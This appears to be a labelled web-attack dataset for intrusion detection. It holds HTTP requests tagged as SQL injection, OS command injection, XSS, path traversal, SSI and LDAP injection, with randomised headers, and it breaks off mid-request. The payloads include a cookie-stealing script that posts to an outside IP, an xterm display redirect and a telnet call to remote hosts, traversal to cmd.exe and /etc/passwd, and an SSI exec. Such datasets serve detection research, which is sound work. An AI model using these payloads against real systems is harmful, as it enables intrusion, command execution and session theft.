Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="305"
Date: Fri, 03 Sep 04 18:06:02 GMT
ETag: "uIDDvKIZiH.oR@ZIi6O"
Expect: elywicem=ialbul;etbnuwsp=a7asis9n
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 22:02:53 GMT
If-Unmodified-Since: Mon, 21 Aug 06 24:09:44 GMT
If-Match: "-fiQB7xbz_BH9HJ46"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 5.2
Pragma: as='en7p'
Proxy-Authorization: Digest realm
Authorization: Digest username="2ihr3onS"
Range: -934,-807,-703421
Referer: /2nIORAa.swf
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: no1n/0.9.5
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: 2.5 www.ccnq.shtml, HTTP/8.9 123.77.151.239
Transfer-Encoding: hgwR
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45700
Start - Id: 35333
class: SqlInjection
GET /rEe8ladk/ouctavjETGgi/aHg25qdXjIFLM1FH/r@57w.js?GrDmzinsertlibUZ=7&ct4terdrqmiho=46014&t3yPOg=18&29minput3=9euOnl&ilbrrliusot=%3B++insert+++into+OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3DtLTtgqt9h%3Bpwd%3DletbU4t%3BNetwork%3DDBMSSOCN%3BAddress%3D8.118.108.73%2C1433%3B%27%2C%27select++*++from+++_sysdatabases%27++++%29%3B+++select+++++*++from+++LinkedOrRemoteSrv1.master.dbo.sysdatabases&ti=pygZEO_A&updatees26P0=aT9i&LosiiyciEciil=mRGKCnhr HTTP/1.1
Host: www.Lwrepe.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, identity;q=0.4, compress;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="68"
Date: Tue, 13 Jun 06 19:06:22 GMT
ETag: "QOvh8ehD1t657W06o5"
Expect: Umhv
From: atozRhO@AwAlyrse.it
If-Modified-Since: Sun, 12 Jul 09 17:47:03 GMT
If-Unmodified-Since: Mon, 03 Sep 07 08:16:27 GMT
If-Match: "eQOGugBRS_UQ1ozIYx"
If-None-Match: *
If-Range: Fri, 14 Jan 05 22:09:21 GMT
Max-Forwards: 683
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: NTLM czhNYUllclJ0QnBzMHNhNjBzN2FyYWFPdW5laWllbHRlZWJlYXB0dGZ6bzhmbmg=
Range: 16442-228208
Referer: /hsail0s/wrir/4eio7w/neOle.exe
TE: trailers,deflate
Trailer: Via
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 9.7; eu-cl; rv:5.1.4) Gecko/97814623
UA-CPU: StrongARM
UA-Disp: 339,8001,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 7.3 157.4.247.113:3859, 7.7 www.rIoe.htm, FTP/0.4 244.189.156.41
Transfer-Encoding: gzip
Upgrade: NIvpys/3.1, spa/2.0, t1ci/3.2, hga/3.0, nvtc/0.2
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35333
Start - Id: 36542
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.soitukaS.be
Connection: Ucleliec
Accept: image/*, video/*
Accept-Charset: us-ascii;q=0.0, x-mac-chinesesimp;q=0.6
Accept-Encoding: gzip;q=0.5, deflate
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 213.233.54.110
Cookie: teeb=hposition>]Edagsna;dotoaqwcrdzistl=1;mmitFsei=kLUoT1I;6aQn=srshai;il=e4csp;2Eri1Ytz=eO0pnnoht5ervawae
Cookie2: $Version="973"
Date: Mon, 03 May 10 09:56:03 UTC
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: qslOdEWa@reveTya6.com
If-Modified-Since: Fri, 28 Nov 08 18:54:29 UTC
If-Unmodified-Since: Sat, 09 Jun 07 12:55:59 GMT
If-Match: "YH8pDTSMDUMrn@@zg"
If-None-Match: "DRah4eYE.S8OiDb"
If-Range: "DS-EBkB7seG4XvJI"
Max-Forwards: 4
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: 2Sa3e 7aaa=sttdaoE
Range: 9206-,968-
Referer: http://www.e0nrg.net/enoeeeea/uyrneb/Orde/94oomW.css
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: ktiN935i/9.1.7.9.3
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: dTei/6.1 www.Benn.gif
Transfer-Encoding: nm1x
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36542
Start - Id: 46848
class: XSS
POST /RX7d1sbodyZWrSD6n9/NIps/p@AwVNZp/sqg0cF-JLJ/ee8ke9ogohjrneioro/0c-L/iuuC/fneoau2EwoaqeeYuoO.js? HTTP/1.1
Content-Length: 398
Content-Language: ww41O,dsT,7idpsbgf
Content-Encoding: deflate
Content-Location: /vycredrs/eseitw.jpg
Content-MD5: eXJmaGRjbmVhdWlrc2locg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Dec 09 08:03:06 GMT
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: www.Uhfv.biz
Connection: as87kvht
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, identity, identity;q=0.9, gzip;q=0.7, gzip;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 175.15.203.198
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Sat, 04 Aug 07 19:26:50 UTC
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Thu, 04 Jan 07 10:27:19 CET
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: "9BSojk2YHEEqKVMLSwhw"
If-None-Match: *
If-Range: "6w_gdrs.A4q_We2Ez.Fc"
Max-Forwards: 89
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: oeeott aeQs6alH=8i4o
Range: -85
Referer: /ihsOora6/ityy.sh
TE: trailers,trailers
Trailer: Referer
User-Agent: oK5Srz http://www.eo85Es.ch
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/9.0 3.132.172.113, 6.0 www.sradi.js
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etrVemwkc=ttstgfnt:eya&SMEI_f=019&Djy5inO@PPRY=opensuir&AsX22vTp=Cnetcat&dsfx0snfloiult=6467972&jt2Gere=88&ls3rt=ds&OcHRB=[\xC0][\xBC]script    >[window.open('http://239.13.194.197/ll.cgi'+document.cookie);][\xC0][\xBC]/script >&vw89y=tDjIG@o&heikaf2m=36&mhennEitetA=h5erobjectmetadwaho;styleen&eU|I&hOrpeHLNntn=A&y:tthpibin8ryAea

End - Id: 46848
Start - Id: 35939
class: PathTransversal
GET /dDOOfEqeGCNGTPXsIBc/tTcWRhaoes/tc/psMQ1Dz/nnheztehaYrzt6ht.html?cilnoe4sh9noE=%29j%7Cetq&neuEeha=obek%29formmllck7d+%22m&Ya=yan7passwd&3dXOVpassthrus=43094&TsEjf4xgrunion=%3C%21--+++++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E HTTP/1.0
Host: 2.45.198.140
Connection: boT4x
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic, isiri-3342;q=0.5, big5
Accept-Encoding: *;q=0.8
Accept-Language: s-pamtdO;q=0.2, lismatbc-erA0;q=0.6
Cache-Control: no-store
Client-ip: 111.208.189.237
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="19"
Date: Fri, 01 May 09 12:34:01 CET
ETag: W/"KVz0darYpD@iPYSQ"
From: be1oUn2@8heteu9.de
If-Modified-Since: Mon, 07 Aug 06 03:03:17 UTC
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: NTLM RW9zaG1yZjIzOWFuYXR0dHJjYW1ybjM3aUVzb2kweW8xaGxuYmZzd2to
Range: -7654,73-181
Referer: http://to8seaaa.com/ahtEwEbl/aaoe/pWfhg/jlnfine.pdf
TE: trailers,deflate,gzip
User-Agent: Mozilla/6.8 (compatible; hilweiftdb; Unix; 7eja; l8thtm; htcee)
UA-CPU: Sparc
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x705
Via: 2.7 185.9.79.0, 7.5 188.63.24.47
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35939
Start - Id: 40301
class: SSI
GET /esd5iu/kBnullboot.iniNn/nnaAosvseyioye6O1/adqEpO.L@2bjj6sQWz3S/LV1yallfawp4oAFT8/euiZiGllebwrnlOs/sWyDdVpO6v1cY63rz.swf?Qgroup byEGcbodys=33516130&LgvH2PPHWwp-p1=+tftltk&SRlocationsYDxmlqVztelnetg=16841&jmeue3inre=cmduinhavingimEernm%5D&l7odyFnierihn=Y&cahmHnss=891174&H_gnexRGY7N=nhjOUuY&YL1GJ1exec3Tar=154358&CQwLealJXhttp=%3C%21--++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5C19%5Cxaiern%5Cpon.exe++++d%3A%5Chnnngyta%5Cwww.atteta.org%5CDAha5amh%5Cdatabase.mdb++++%2Fx+++++exporttofoxpro%22--%3E&fxtr8ne1re=rmnsea&hchtxherzwse=%28Ewite%26l%25&0jeawE1=90&kcC8b=1 HTTP/1.0
Host: www.hedhf.org
Connection: close
Accept: image/jpeg;q=0.1, text/*;q=0.3
Accept-Charset: windows-1251, euc-jp;q=0.5, shift_jis, euc-jp, iso-8859-8;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: Bthtyne=d9mau
Client-ip: 225.234.167.170
Cookie: q7uWlQLXI5D=tQWNVisew
Cookie2: $Version="373"
Date: Fri, 25 Sep 09 22:22:08 UTC
ETag: "aZA6H-lbM.cdD6r"
Expect: dwEIlasn
From: ih1qglL@shstna.biz
If-Modified-Since: Sat, 24 Nov 07 22:16:27 CET
If-Unmodified-Since: Thu, 24 Feb 05 15:17:14 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 5438
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: Digest response="3f31C46cFe8c67aF5E5a5aF39FC6de6F"
Range: 5046-3165,-1034
Referer: /DsioOpc1/ElOta55/abtl/satsyett.php4
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (X11; U; Solaris 4.5; Mt-u3; rv:7.5.1) Gecko/54943343
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40301
Start - Id: 36964
class: LdapInjection
GET /eh7we/1Bwflq/hXXSzimgi9F7r/e8/lhyoestEts5itpiahms/avQhlxkey.shtml?iwiloi34t=62&q4tvrltrU5tnSae=NceAi1c2+4s&6tOOoHiliDntszn=3168943&acnnqifhet=ogtinaNeqntbn&natio9n4heoe=sldnjtFoie&ronrc5sTrstla=5195&sbe7lerintIam=lwa&oM=nA79eRr&6roeg=rHq&1Heu=+t-gjo&ghskalahFtn=0&iqaRNpaenuIUps=n.dVvVQvSir&orftihsa55N=3o+e&tietaw3Mbex=3247746&84bTrist=tHi8w%29%28+++%7C+%28hoR%3D*%29 HTTP/1.0
Host: www.t75op.uk
Connection: keep-alive
Accept: text/*, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.3, deflate;q=0.8, gzip;q=0.8
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 248.80.57.117
Cookie: ae7=wkxdDF6;deLrel5n5=oev>e e0t;orc2trag=nxM0Vnrn5;0xtelnet-@bJusr=uN;1a4i774=078535
Cookie2: $Version="3"
Date: Sun, 03 Jan 10 22:34:27 CET
ETag: W/"0hNPjWgcQZJH5il"
Expect: 9pthrt4s=irio1g;sAsnfse=eecs
From: ooeh@nqieoausen.gov
If-Modified-Since: Sat, 09 Sep 06 05:08:04 UTC
If-Unmodified-Since: Sat, 13 Dec 08 05:44:59 GMT
If-Match: "jnoR5LVJtg85G99Y@r"
If-None-Match: "b81RCllo4JeISay"
If-Range: *
Max-Forwards: 27
Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest algorithm=MD5
Range: 84-,-422477,1197-5319
Referer: http://www.tlxih.be/nlw7O/iadI.gif
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/0.1 (Windows; U; Win98 8.3; uo-vg; rv:8.2.0) Gecko/46044046
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: voikit/1.2
Warning: 812 30.165.31.159 "aiaexjhepibyi" 
X-Serial-Number: 36508239
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36964
Start - Id: 43013
class: OsCommanding
POST /ho/iu/tZ-qG/hrDEW-ajWX2kJFZ_sAB5/lrreTnrrTdhc.swf? HTTP/1.1
Content-Length: 240
Content-Language: rHiefsc,tfhirehe,de
Content-Encoding: compress
Content-Location: /ieua9eTs.fgf
Content-MD5: eDV5ZW5iZlR4dXRlYXFpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jan 04 05:25:56 UTC
Last-Modified: Mon, 14 Dec 09 19:07:25 GMT
Host: www.e9la99tn.org:865
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-jp;q=0.7, x-mac-greek;q=0.8, windows-1250
Accept-Encoding: 
Accept-Language: g-ztste
Cache-Control: max-age=3
Client-ip: 87.239.190.162
Cookie: becR=tv1ipseTO93ikueen;htccutys4=-forme m;wei8btv=t_BB9DfsE;tmpklhpLZ25@tmpD= ;dhdlle8hbuess=I;ewaixAeovuotm=oitae7es 4jz
Cookie2: $Version="787"
Date: Thu, 23 Mar 06 06:54:43 GMT
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: ltfreq
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Mon, 12 Mar 07 20:26:42 GMT
If-Unmodified-Since: Sat, 26 Aug 06 23:07:08 CET
If-Match: "qGZo@jMcMeCGnSlW0Kx"
If-None-Match: "xFf7KSm5zitD7A0J"
If-Range: "gI5FGGrGt_9N7wjZ"
Max-Forwards: 428
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: http://xcdSd5.st/dmee6vv.php4
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/2.8 (Windows; U; WinNT 2.5; 1u-ae; rv:2.6.2) Gecko/79711416
UA-Color: color8
UA-Pixels: 2695x320
Via: 8.2 58.206.38.17, HTTP/4.6 www.7zsmfo0.htm:52652
Transfer-Encoding: deflate
Upgrade: 0yU/2.3, ikP/9.3, iaY/2.4, vete/4.6, SjSgdt/2.7
Warning: 931 www.eamhn.png "aDRe6i" "Tue, 14 Aug 07 15:29:26 GMT"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

nn=o8A73&dsre8o=6314600912&G4Y@ccatDopendq=73939&aVM1aC=|/usr/openwin/bin/xterm+-display+7.105.140.88:0%00&ctUAoacteea=oh&zhTsS=sy_K&nodepXgCKshutdowng=eYBt5&tavlltitiveyt=rcgretc&DAhpwe=ae&Lr4E8htpass=59871015&uIznn5=4815

End - Id: 43013
Start - Id: 43239
class: OsCommanding
GET /tsPsBee4eXL/rrhlern/Tmo1ep2aheHofat/t1RCixhvK/uv/OrXQkslikeOR4/rCrmII-J2nJ5Y0.tiff?V6q.xc6aa=%5C%22%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.regeetrata.com++1904+%3B&ruo=tw%24zn&pss5eoetaalcTc=46129&ta7it5odea3=914 HTTP/1.1
Host: 54.29.183.99
Connection: almEnhd
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hweaml-3ti6ir;q=0.8, tmSe-mktaw4kg;q=0.4, nrorAs-s5ioa;q=0.8, 5e4af-Tree
Cache-Control: no-store
Client-ip: 36.195.182.59
Cookie: oroErw2stt=ttyie0phptleP;RIscriptONQlUH4E=2762775;igunsse8a1=38382;arayo1zes=3783997;tEednNnsw9mYcai=hplivu;letri1lai=iHNghi7Y_SDA
Cookie2: $Version="086"
Date: Fri, 06 Feb 09 16:15:42 CET
ETag: "7vRs2CO.Rsi0wa-sA5q"
Expect: ioiitno=sbij
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Sat, 20 Mar 10 20:27:51 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 75
MIME-Version: 7.1
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: xta4e coetilod=pcyr2o
Range: -330,06836-
Referer: http://nnahop.ch/xweltcee/tIl46e/od6ae.bin
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/2.1 (X11; U; Linux i386 8.4; w4-aS; rv:2.1.7) Gecko/05482171
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: FTP/3.7 4.96.247.82, HTTP/8.9 www.2xxAl.html, esikn/8.8 www.to6hea.tiff
Transfer-Encoding: deflate
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43239
Start - Id: 39388
class: SSI
GET /zSti.htm?u6Tgrg=eNv1%3Alrttdocumenth%5B%3Cw&88=oaiton+&lsete2e=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.hre4oiRc7h.biz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: tEadst='ohe'
Client-ip: 242.172.212.87
Cookie: ThoydzEne59R=0774;alauccrrboaes=dUc;hi=+HRl;siLwprEsrhno5f=449;PrUF=ioc1
Cookie2: $Version="9"
Date: Wed, 04 Feb 09 08:30:14 CET
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: bnehhbgf
From: lece@srdgy.org
If-Modified-Since: Wed, 30 Nov 05 18:41:36 GMT
If-Unmodified-Since: Mon, 17 Sep 07 08:57:05 GMT
If-Match: "xWyF-Pl0UI.2DDe.dJz"
If-None-Match: "XP6jmz6LsW7qWx7x-VR"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 9
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXg1ZWE0aEl3dzVpaW5FdG9icHdlZWRuU29oYW1hZDg=
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: http://www.a0i1r.net/9nkoapen/jnlhvrpv/6ntp/dtOUF2c/dvhneEao.pl
TE: gzip,trailers,chunked
Trailer: Range
User-Agent: Eeee1n
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 9.9 www.zoeti.png, HTTP/1.1 www.n57NNyoT.jpg
Transfer-Encoding: gzip
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39388
Start - Id: 35418
class: SqlInjection
GET /kyGFQiZawKZT4.sh?WhavingIkJ=rnb&mmair0sa=uO8nhaoI&dairzseer=OeIe4etw&@SWU=or+++++0%3C%3E%28select+count%28*%29+from++++i4%29 HTTP/1.0
Host: 211.67.42.143
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2521
Client-ip: 67.105.71.5
Cookie: tsie=vGfuTGrq;yas5drtpiLra=msichhjservicesoI;cgLiskHczhs=n ea;-6TZnodeboot.ini-0styleQ=5174637205
Cookie2: $Version="35"
Date: Tue, 29 Nov 05 20:40:39 CET
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 100-continue
From: meCo6@c0Onn.it
If-Modified-Since: Tue, 06 Mar 07 16:27:55 GMT
If-Unmodified-Since: Sat, 28 Jul 07 22:16:45 CET
If-Match: "S-21pHT6TPzIb-N"
If-None-Match: "kIopZ_T@-PF40pP-e"
If-Range: Tue, 06 Mar 07 23:10:38 UTC
Max-Forwards: 667
MIME-Version: 5.1
Pragma: et=Hiyii65
Proxy-Authorization: Digest cnonce="snblh"
Authorization: NTLM dWhhd2l1ZXhhN3VoZUNpeWUxbmllcGdhblRybm5hb3RvdXJwaWxTcm50c3Rr
Range: 12-28
Referer: /rnlirs/ouonh2s/4hlrM/cinsas/esdrt9.tar.gz
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 1.4; ru-sp; rv:3.5.3) Gecko/91879315
UA-CPU: Sparc
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 011x4007
Via: FTP/8.5 www.TeDamv.css
Transfer-Encoding: deflate
Upgrade: nsie/1.7, garelI/0.5
Warning: 606 www.i1cauo.tiff:848 "mpsrhdkhdyian" 
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 281340124
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35418
Start - Id: 38070
class: LdapInjection
GET /oyee4hteaohlEfthsewn/TSg8dearcioe4hudEM/oRWbVv_vQYZC5II/rbeonne/eeepeeao/usNXl.sh?mncatiIai=-na%3Edocument&rornhErumiys=i&eitp=95520&d7fnr8sens9ao=62%29%28%26%28objectClass%3Dssyo%29%28%7C%28sn++%3D++eeed%29%28cn%3Dna++++J*%29%29&Jas7m=hwZLylho7MV&drLbi=po%3Ctd&CCh83AgtelnetNEZ=eSDiiplrrysfiw&rm=i3tTsch7Fcacyaegui&eisg=sea2n1iZOJxy&u1r2kmmfs=redsterin&aee1o=36112&uMi0tad1zaon0=985186&cftnei=n%27a0a+mz+a&Oj5CXw-tLvadminm=r%3A&n2g09TrgiIne=c HTTP/1.0
Host: www.ne9ao.gov:541
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.3, shift_jis;q=0.2
Accept-Encoding: identity, compress
Accept-Language: *
Cache-Control: min-fresh=10826
Client-ip: 163.227.108.150
Cookie: aAlebesp=45124
Cookie2: $Version="57"
Date: Fri, 01 Feb 08 06:37:36 GMT
ETag: W/"aqQyLq-Rgqc2QXcXU"
Expect: atelnw=rOlr2ln
From: klienot@sqnSctf.com
If-Modified-Since: Tue, 24 Feb 09 21:33:24 GMT
If-Unmodified-Since: Sun, 20 Sep 09 10:46:33 UTC
If-Match: *
If-None-Match: *
If-Range: "FmJxizBZzLrlYbp@efNj"
Max-Forwards: 3591
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM aXBzY3hpYXR0NDVldGV3Y2FKbGFuYUhtcmhvVmhwYTNzaWVpb01vcmlyaDNub2J6
Authorization: Digest username="tezr"
Range: 77-,76-
Referer: /dtailhs.msf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.9 (X11; U; Linux i586 6.5; aq-al; rv:2.7.5) Gecko/32333590
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5823x093
Via: 7t9/8.6 www.tntot.css, 9.6 www.ht2upb.html, 2.8 88.207.240.247
Transfer-Encoding: deflate
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 530 132.99.115.0 "etnafLfea7n8Inlen7u9" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38070
Start - Id: 48135
class: XSS
GET /VQZrwgetl.uUddOub/i2iWhpjRZHHmnk/eSOYI9_MUN-ynK16.bin?ozS8ggF=hqy7DG9g&r4seemltie=dbci&tantsLerEegaa=Dn9q&7ow=5602282125&ueluatekuz6eee=%3Cdiv++onmouseover+++%3D++%22++%5Balert++%28%27aosIebo%27%29%3B%5D+++%22+%3E HTTP/1.1
Host: 158.172.200.18:80
Connection: cttoeO
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-8-i;q=0.8, iso-2022-jp, iso-8859-7, iso-8859-9;q=0.0
Accept-Encoding: 
Accept-Language: tqhem-hmuiolo;q=0.8, op9aeMay-ebta, 4dooc9hd-Iou;q=0.9, ruaen-mF
Cache-Control: Ohdisu='tilvl'
Client-ip: 34.160.166.92
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="346"
Date: Mon, 21 Dec 09 17:06:55 CET
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: 100-continue
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 18 May 05 07:34:58 UTC
Max-Forwards: 1686
MIME-Version: 8.0
Pragma: ew=CstO
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 839-854295,-2024
Referer: http://www.eMhanE.de/tw9yiphE.cfm
TE: trailers,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: AtcRtrts
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: deflate
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48135
Start - Id: 44473
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: www.4egpvEl.it
Connection: snwdsek
Accept: image/gif, application/postscript;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.4, compress, gzip, deflate
